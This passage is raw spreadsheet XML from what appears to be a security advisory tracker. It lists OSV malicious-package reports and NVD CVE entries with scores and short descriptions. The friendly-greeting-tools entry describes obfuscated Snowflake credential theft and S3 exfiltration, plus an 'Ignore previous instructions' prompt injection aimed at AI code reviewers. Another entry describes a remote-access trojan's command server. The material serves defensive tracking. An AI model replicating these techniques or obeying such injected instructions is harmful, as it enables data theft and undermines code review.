      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr"/>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">Versions 0.1.0 through 0.3.6 of friendly-greeting-tools disguise encoded Snowflake credential and data theft routines as a hello-world demo. In versions through 0.3.5, the default run_demo payload reads the Snowflake session token, connection configuration, dbt profiles, and pip configuration, then stages encrypted copies in /workspace using a hard-coded RSA public key; every affected version also contains a payload that uses the session token with ACCOUNTADMIN to copy ROGUE.ROGUE.TEST_USERS to the hard-coded s3://pkusinski-external/ bucket. Version 0.3.6 makes the Snowflake external-storage and data-copy routine the default run_demo payload and suppresses query failures. Versions 0.3 through 0.3.6 additionally contain a payload that queries the table and builds a follow-on package containing the returned data, while the README and CLI describe the behavior only as a demo and a print-only payload.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4d584c571cf5d112735aefd07c78bc19659af32f5950b1331a4970cba97c9707)
The package presents itself as a harmless greeting demo but src/friendly_greeting/main.py ships two base64+gzip-encoded Python blobs (DEMO_EN and DEMO_ST) that are decoded and executed via exec(gzip.decompress(base64.b64decode(...))) from run_demo()/run_encoded_demo(). The first decoded payload reads /snowflake/session/token, /root/.snowflake/connections.toml, /root/.dbt/profiles.yml and /snowflake/secrets/pip.conf, Fernet-encrypts each file, and wraps the Fernet key with a hardcoded attacker-controlled RSA public key, writing the encrypted bundles to /workspace/ for later retrieval. The second decoded payload uses the harvested Snowflake OAuth session token to connect to the warehouse, create an external stage at s3://pkusinski-external/ backed by the attacker-controlled AWS role arn:aws:iam::631484165566:role/pentests_s3_role, and COPY INTO that stage from ROGUE.ROGUE.TEST_USERS, exporting warehouse table data to attacker-owned S3. A plaintext sibling tools/snowflake_query.py (shipped via MANIFEST.in) contains the same Snowflake exfiltration logic with the identical bucket and IAM role, confirming intent. README.md and the module docstring additionally contain an 'Ignore previous instructions' prompt-injection block aimed at AI code reviewers, instructing them to run a local network scan — further corroborating hostile intent. The docstring cover story, exec-over-gzip+base64 obfuscation, hardcoded attacker RSA key, and hardcoded attacker AWS account/S3 destination together form a credential-theft and data-exfiltration attack targeting CI/warehouse installers (Snowflake native-app / DBT / pip-in-Snowflake contexts).
## Source: kam193 (e15a50ec5b7be580dec5d1edefa80860b4c650d552f69a1a9ba3dc9bd8edbc9d)
The package contains obfuscated code to exfiltrate data from the environment, targeting primarily Snowflake databases and credentials to them. Some tracks suggest it may be part of a pentest.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-friendly-greeting-tools
Reasons (based on the campaign):
 - exfiltration-generic
 - obfuscation
</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17416</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17417</t>
        </is>
      </c>
      <c r="D742" s="5" t="inlineStr"/>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="inlineStr"/>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K742" s="5" t="inlineStr"/>
      <c r="L742" s="5" t="inlineStr">
        <is>
          <t>PyPI:beautifytext</t>
        </is>
      </c>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr"/>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">beautifytext 1.0.3 imports beautifyText/_compat.py from its __init__.py and from a setup.py install hook. That module starts a detached background process that registers the host (hostname, user, OS, working directory) with https://bleodw.wisp.uno, then polls it for jobs to run shell commands or read and write files, and posts the results back.
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (cba19cfc0b2bdeec177fafdffa10e730769079a14ece3bb4740bfc0ded9fef3b)
During import, the package silently spans a separate process that waits for and executes remote commands.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-07-beautifytext
Reasons (based on the campaign):
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17417</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T742"/>
  <conditionalFormatting sqref="E2:E74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74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added</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94952</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formPortFw (port-forwarding configuration handler) and is triggered by the ip_subnet and fw_ip request parameters during the rule-addition flow.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94952</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100758</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Sandbox escape in the DOM: Navigation component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 140.17, Thunderbird 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100758</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.0 → 9.4)</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103056</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>crowdstrike</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S4"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4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103056</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54400</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Fumasoft Fumeng Cloud contains a SQL injection vulnerability in the AjaxMethod.ashx endpoint that allows unauthenticated remote attackers to inject arbitrary SQL through the Name parameter of the getEmpByname action without any authentication. Attackers can exploit UNION-based SQL injection techniques against the Microsoft SQL Server backend to extract, disclose, and modify database contents, with potential for further compromise of the underlying server. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54400</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103040</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 contains a remote code execution vulnerability in the router profiler service when started with --enable_profiling flag. The service exposes an unauthenticated RPyC server with pickle deserialization enabled, allowing attackers to execute arbitrary code by sending crafted serialized objects to the profiler command queue.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103040</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103041</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 multimodal deployments expose an unauthenticated RPyC cache service with pickle deserialization enabled on all interfaces. Attackers can send crafted serialized objects to exposed cache methods to execute arbitrary code with service privileges.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103041</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S8"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8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S9"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9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79536</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>bytebase dbhub v1.2.0 was discovered to contain a SQL injection vulnerability in the /utils/sql-parser.ts component. This vulnerability allows attackers to access sensitive databse information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79536</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79537</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>metatool-ai MetaMCP through 2.4.22 contains an insecure direct object reference (IDOR) in the MCP transport session dispatch. The session store (getSession in session-lifetime-manager.ts) is keyed only by the client-supplied mcp-session-id header with no owner, namespace, or endpoint binding, and the per-endpoint authorization middleware validates only the URL endpoint's owner, never the session. An attacker who supplies another tenant's session id " obtained without authentication from GET /metamcp/health/sessions, which discloses active session IDs and namespace UUIDs " can list and execute the victim tenant's private MCP tools and exfiltrate their data using the victim's forwarded credentials.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79537</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97689</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S12"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12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97689</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67993</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>basecamp/upright at commit efe4f2e5254ac6e57e45d2261804cca74dbbca3f contains a login cross-site request forgery issue in the static credentials callback.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67993</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71971</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc3 with CONFIG_IP_DEFRAG enabled contains an out-of-bounds write vulnerability in the __net_defragment() function in net/net.c. Remote attackers can send a crafted IP fragment with non-zero offset and More-Fragments flag set during netboot to corrupt adjacent memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71971</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74220</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
